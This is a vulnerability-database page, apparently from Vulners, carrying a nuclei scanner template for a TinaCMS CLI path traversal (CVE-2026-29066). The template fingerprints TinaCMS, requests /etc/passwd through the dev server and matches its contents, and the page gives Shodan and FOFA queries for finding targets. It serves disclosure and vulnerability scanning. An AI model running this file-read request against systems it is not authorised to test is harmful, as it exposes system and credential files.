Lucene search
+L

TinaCMS - Path Traversal

🗓️ 18 Aug 2026 02:59:29Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 64 Views

TinaCMS CLI vulnerability allows unauthenticated arbitrary file read via dev server path traversal.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-29066
12 Mar 202616:57
attackerkb
circl
Circl
CVE-2026-29066
12 Mar 202605:10
circl
cnnvd
CNNVD
TinaCMS 安全漏洞
12 Mar 202600:00
cnnvd
cve
CVE
CVE-2026-29066
12 Mar 202616:57
cve
cvelist
Cvelist
CVE-2026-29066 Arbitrary File Read via Disabled Vite Filesystem Restriction in TinaCMS CLI
12 Mar 202616:57
cvelist
euvd
EUVD
EUVD-2026-11615
12 Mar 202620:32
euvd
github
Github Security Blog
TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction
12 Mar 202620:32
github
nvd
NVD
CVE-2026-29066
12 Mar 202617:16
nvd
osv
OSV
GHSA-M48G-4WR2-J2H6 TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction
12 Mar 202620:32
osv
ptsecurity
Positive Technologies
PT-2026-25014
12 Mar 202600:00
ptsecurity
Rows per page
id: CVE-2026-29066

info:
  name: TinaCMS - Path Traversal
  author: theamanrawat
  severity: medium
  description: |
    TinaCMS CLI < 2.1.8 contains a file system read vulnerability caused by disabled Vite server.fs.strict setting, letting unauthenticated attackers read arbitrary files on the host system, exploit requires access to the dev server.
  impact: |
    Unauthenticated attackers can read arbitrary files on the host system, potentially exposing sensitive information.
  remediation: |
    Update to version 2.1.8 or later.
  reference:
    - https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6
    - https://nvd.nist.gov/vuln/detail/CVE-2026-29066
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.2
    cve-id: CVE-2026-29066
    epss-score: 0.01025
    epss-percentile: 0.60669
    cwe-id: CWE-200
  metadata:
    verified: true
    max-requests: 3
    vendor: tinacms
    product: tinacms
    shodan-query: http.title:"TinaCMS"
    fofa-query: body="TinaCMS" || body="tinacms"
  tags: cve,cve2026,tinacms,lfi,vuln,unauthenticated

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "tina-tailwind"
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/etc/passwd"

    host-redirects: true
    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:x:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008f7e1eca22052d85d5fd73702b175c2dddb7b5d40bec1be52c2c9c165a6ebfe7022001077a5e708f8ae2cf29daed8e776042244df3e53092c3b4b25fe5b0e4409552:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Apr 2026 08:54Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.16.2
EPSS0.01025
SSVC
64